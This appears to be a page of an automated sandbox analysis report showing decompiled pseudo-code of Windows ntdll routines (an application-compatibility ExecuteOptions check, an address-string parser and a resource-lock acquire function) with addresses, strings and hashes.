                                			E00A67EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0xb12088; // 0x77412276
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00A67F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00A83F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E00A3DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0xb14218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00A83F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00A40D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00A83F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00A48375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00A83F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E00AAE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00A83F92();
					_t38 = 1;
					L2:
					return E00A3E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                0x00a67f08
                                0x00a67f0f
                                0x00a67f12
                                0x00a67f1b
                                0x00a67f31
                                0x00a83ead
                                0x00a83eb4
                                0x00000000
                                0x00000000
                                0x00a83eba
                                0x00a83ecd
                                0x00a83ed2
                                0x00a83ee1
                                0x00a83ee7
                                0x00a83eec
                                0x00a83f12
                                0x00a83f18
                                0x00a83f1a
                                0x00000000
                                0x00000000
                                0x00a83f20
                                0x00a83f26
                                0x00a83f28
                                0x00000000
                                0x00000000
                                0x00a83f2e
                                0x00a83f30
                                0x00000000
                                0x00000000
                                0x00a83f3a
                                0x00a83f3b
                                0x00a83f53
                                0x00a83f64
                                0x00a83f69
                                0x00a83f6c
                                0x00a83f6d
                                0x00a83f6f
                                0x00a8e304
                                0x00a8e30f
                                0x00a8e315
                                0x00a8e31e
                                0x00a8e321
                                0x00a8e327
                                0x00a8e329
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00a8e32f
                                0x00a8e32f
                                0x00a8e337
                                0x00a8e33a
                                0x00a8e33b
                                0x00a8e33d
                                0x00a8e33f
                                0x00a8e341
                                0x00a8e341
                                0x00a8e34e
                                0x00a8e353
                                0x00a8e358
                                0x00a8e35d
                                0x00a8e35f
                                0x00000000
                                0x00000000
                                0x00a8e365
                                0x00a8e365
                                0x00a8e368
                                0x00a8e36e
                                0x00000000
                                0x00000000
                                0x00a8e374
                                0x00a8e32f
                                0x00a83f75
                                0x00a83f7a
                                0x00a83f7c
                                0x00a83f7e
                                0x00a83f86
                                0x00a67f39
                                0x00a67f47
                                0x00a67f47
                                0x00a67f37
                                0x00a67f37
                                0x00000000

                                APIs
                                • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00A83F12
                                Strings
                                • ExecuteOptions, xrefs: 00A83F04
                                • Execute=1, xrefs: 00A83F5E
                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00A83F4A
                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00A83F75
                                • v"Aw, xrefs: 00A67F08
                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00A8E2FB
                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 00A8E345
                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00A83EC4
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: BaseDataModuleQuery
                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$v"Aw
                                • API String ID: 3901378454-2040153887
                                • Opcode ID: 080e795c3001f422dfa51e1d19a0e3e1948f7e55d9154d9ddc4186c933c4abae
                                • Instruction ID: 30542117c3fa3fb4fd26b2e8cedbfccadba597b8f65ad4cda1ec70855ac57f7e
                                • Opcode Fuzzy Hash: 080e795c3001f422dfa51e1d19a0e3e1948f7e55d9154d9ddc4186c933c4abae
                                • Instruction Fuzzy Hash: 7A418772A5021CBADF20EB94DCC6FDE73BCAB54714F0005A9B605E6191EB709F45CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A70B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00A70B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00A48980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E00A3DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00A70CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00A70CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E00A706BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E00A706BA(_t135, _t178) == 0 || E00A70A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00A70CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00A70CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E00A706BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E00A706BA(_t124, _t142) == 0 || E00A70A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                0x00a70b21
                                0x00a70b24
                                0x00a70b27
                                0x00a70b2a
                                0x00a70b2d
                                0x00a70b30
                                0x00a70b33
                                0x00a70b36
                                0x00a70b39
                                0x00a70b3e
                                0x00a70c65
                                0x00a70c68
                                0x00a70c6a
                                0x00a70c6f
                                0x00a9eb42
                                0x00000000
                                0x00000000
                                0x00a9eb48
                                0x00a9eb48
                                0x00a70c75
                                0x00a70c7a
                                0x00a9eb54
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00a9eb5a
                                0x00a70c80
                                0x00a70c84
                                0x00a9eb98
                                0x00000000
                                0x00000000
                                0x00a9eba6
                                0x00a70cb8
                                0x00a70cba
                                0x00a70cd3
                                0x00a70cda
                                0x00a70ce4
                                0x00a70ce9
                                0x00000000
                                0x00a70cec
                                0x00a70c8c
                                0x00a9eb63
                                0x00000000
                                0x00000000
                                0x00a9eb70
                                0x00a9eb75
                                0x00a9eb7d
                                0x00000000
                                0x00000000
                                0x00a9eb8c
                                0x00000000
                                0x00a9eb8c
                                0x00a70c96
                                0x00000000
                                0x00000000
                                0x00a70ca2
                                0x00a70cac
                                0x00a70cb4
                                0x00000000
                                0x00000000
                                0x00a70b44
                                0x00a70b47
                                0x00a70b49
                                0x00000000
                                0x00000000
                                0x00a70b4f
                                0x00a70b50
                                0x00000000
                                0x00000000
                                0x00a70b56
                                0x00a70b62
                                0x00a70b7c
                                0x00a70bac
                                0x00a70a0f
                                0x00a9eaaa
                                0x00000000
                                0x00a9eac4
                                0x00a9eac4
                                0x00a70bd0
                                0x00a70bd0
                                0x00a70bd4
                                0x00a70bd9
                                0x00000000
                                0x00000000
                                0x00a70bdb
                                0x00a70be0
                                0x00a9eb0e
                                0x00a70a1a
                                0x00000000
                                0x00a70a1a
                                0x00a9eb1a
                                0x00a9eb1f
                                0x00a9eb27
                                0x00000000
                                0x00000000
                                0x00a9eb36
                                0x00000000
                                0x00a9eb36
                                0x00a70bea
                                0x00000000
                                0x00000000
                                0x00a70bf6
                                0x00a70c00
                                0x00a70c03
                                0x00a70c0b
                                0x00000000
                                0x00a70c0b
                                0x00a9eaaa
                                0x00000000
                                0x00a70a15
                                0x00a70bb6
                                0x00000000
                                0x00a70bc6
                                0x00a70bc6
                                0x00a70bcb
                                0x00a70c15
                                0x00000000
                                0x00000000
                                0x00a70c1d
                                0x00a70c20
                                0x00a70c21
                                0x00a70c24
                                0x00a70c24
                                0x00a70c26
                                0x00000000
                                0x00a70c26
                                0x00a70bcd
                                0x00000000
                                0x00a70bcd
                                0x00a70b89
                                0x00a70b89
                                0x00a70b90
                                0x00000000
                                0x00000000
                                0x00a70b96
                                0x00000000
                                0x00a70b96
                                0x00a70a04
                                0x00a70a04
                                0x00a70b9a
                                0x00a70b9a
                                0x00a70b9b
                                0x00a70b9f
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00a70ba5
                                0x00a70ac7
                                0x00a70aca
                                0x00a9eacf
                                0x00000000
                                0x00a9eade
                                0x00a9eade
                                0x00a9eae3
                                0x00000000
                                0x00000000
                                0x00a9eaf3
                                0x00a9eaf6
                                0x00a9eaf7
                                0x00a9eafe
                                0x00a9eb01
                                0x00000000
                                0x00a9eb01
                                0x00a9eacf
                                0x00a70ad0
                                0x00a70ad4
                                0x00000000
                                0x00000000
                                0x00a70ada
                                0x00a70ae6
                                0x00a70c34
                                0x00000000
                                0x00a70c47
                                0x00a70c49
                                0x00a70c4a
                                0x00a70c4e
                                0x00a70c51
                                0x00a70c54
                                0x00a70c57
                                0x00a70c5a
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00a70c60
                                0x00a70afb
                                0x00a70afe
                                0x00a70b02
                                0x00a70b05
                                0x00a70b08
                                0x00000000
                                0x00a70b08
                                0x00a70ae6
                                0x00a70b44
                                0x00a709f8
                                0x00a709f8
                                0x00a709f9
                                0x00000000
                                0x00000000
                                0x00a9eaa0
                                0x00000000

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: __fassign
                                • String ID: .$:$:
                                • API String ID: 3965848254-2308638275
                                • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                • Instruction ID: d00bf9a05ace87186633b67cd3e62a755f60920a50e42e2243d46ef1f255b08d
                                • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                • Instruction Fuzzy Hash: 07A1AC71E0030AEFCF25CF64CC55ABEB7B4AF55305F24C56AE84AA7282DB349A41CB51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A70554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                Download Yara Rule
                                C-Code - Quality: 50%
                                			E00A70554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00b101c0;
									_push(_t144);
									_push(0);
									_t51 = E00A2F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00A74FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00A83F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00A83F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E00AB217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00A83F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00A73915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00b101c0;
												_push(_t138);
												_push(0);
												_t58 = E00A2F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00A74FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00A83F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00A83F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E00AB217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00A83F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00A73915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00A55384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E00A2F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00A73915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E00A2F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00A73915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E00A2F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00A73915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00A55329(_t110, _t138);
																_t69 = E00A553A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                0x00a7055a
                                0x00a7055d
                                0x00a70563
                                0x00a70566
                                0x00a705d8
                                0x00a705e2
                                0x00a705e5
                                0x00000000
                                0x00a705e7
                                0x00a705e7
                                0x00a705ea
                                0x00a705f3
                                0x00a705f3
                                0x00a70568
                                0x00a70568
                                0x00a70568
                                0x00a70569
                                0x00a70569
                                0x00a70569
                                0x00a7056b
                                0x00000000
                                0x00000000
                                0x00a9217f
                                0x00a92183
                                0x00a9225b
                                0x00a9225f
                                0x00a92189
                                0x00a9218c
                                0x00a9218f
                                0x00a92194
                                0x00a92199
                                0x00a9219d
                                0x00a921a0
                                0x00a921a2
                                0x00a921ce
                                0x00a921ce
                                0x00a921ce
                                0x00a921d0
                                0x00a921d6
                                0x00a921de
                                0x00a921e2
                                0x00a921e8
                                0x00a921e9
                                0x00a921ec
                                0x00a921f1
                                0x00a921f6
                                0x00000000
                                0x00000000
                                0x00a921f8
                                0x00a921fb
                                0x00a92206
                                0x00a9220b
                                0x00a9220c
                                0x00a92217
                                0x00a92226
                                0x00a9222b
                                0x00a9222c
                                0x00a9222f
                                0x00a92232
                                0x00a92235
                                0x00a92235
                                0x00a9223a
                                0x00a9223f
                                0x00a92241
                                0x00a92243
                                0x00a92248
                                0x00a92248
                                0x00a9224d
                                0x00a9224f
                                0x00a92262
                                0x00a92263
                                0x00a92268
                                0x00a92269
                                0x00a92269
                                0x00a92269
                                0x00a9226d
                                0x00000000
                                0x00000000
                                0x00a92276
                                0x00a92279
                                0x00a9227e
                                0x00a92283
                                0x00a92287
                                0x00a9228a
                                0x00a9228d
                                0x00a9228f
                                0x00a922bc
                                0x00a922bc
                                0x00a922bc
                                0x00a922be
                                0x00a922c4
                                0x00a922cc
                                0x00a922d0
                                0x00a922d6
                                0x00a922d7
                                0x00a922da
                                0x00a922df
                                0x00a922e4
                                0x00000000
                                0x00000000
                                0x00a922e6
                                0x00a922e9
                                0x00a922f4
                                0x00a922f9
                                0x00a922fa
                                0x00a92305
                                0x00a92314
                                0x00a92319
                                0x00a9231a
                                0x00a9231d
                                0x00a92320
                                0x00a92323
                                0x00a92323
                                0x00a92328
                                0x00a9232d
                                0x00a9232f
                                0x00a92331
                                0x00a92336
                                0x00a92336
                                0x00a9233b
                                0x00a9233d
                                0x00a92350
                                0x00a92351
                                0x00a92356
                                0x00a92359
                                0x00a92359
                                0x00a9235b
                                0x00a9235d
                                0x00a55367
                                0x00a5536b
                                0x00a55372
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00a92363
                                0x00a92363
                                0x00a92369
                                0x00a9236a
                                0x00a9236c
                                0x00a92371
                                0x00a92373
                                0x00000000
                                0x00a92379
                                0x00a92379
                                0x00a9237a
                                0x00a9237f
                                0x00a9237f
                                0x00a92385
                                0x00a92386
                                0x00a92389
                                0x00a9238e
                                0x00a92390
                                0x00a55378
                                0x00a5537c
                                0x00a92396
                                0x00a92396
                                0x00a92397
                                0x00a9239c
                                0x00a923a2
                                0x00a923a3
                                0x00a923a6
                                0x00a923ab
                                0x00a923ad
                                0x00000000
                                0x00a923b3
                                0x00a923b3
                                0x00a923b4
                                0x00a923b9
                                0x00a923ba
                                0x00a923ba
                                0x00a923bc
                                0x00a923bf
                                0x00000000
                                0x00000000
                                0x00a89153
                                0x00a89158
                                0x00a8915a
                                0x00a8915e
                                0x00a89160
                                0x00000000
                                0x00a89166
                                0x00a89166
                                0x00a89171
                                0x00a89176
                                0x00a89176
                                0x00000000
                                0x00a89160
                                0x00a923c6
                                0x00a923ce
                                0x00a923d7
                                0x00a923d7
                                0x00a923ad
                                0x00a92390
                                0x00a92373
                                0x00a9233f
                                0x00a9233f
                                0x00000000
                                0x00a9233f
                                0x00a92291
                                0x00a92291
                                0x00a92293
                                0x00a92295
                                0x00a9229a
                                0x00a922a1
                                0x00a922a3
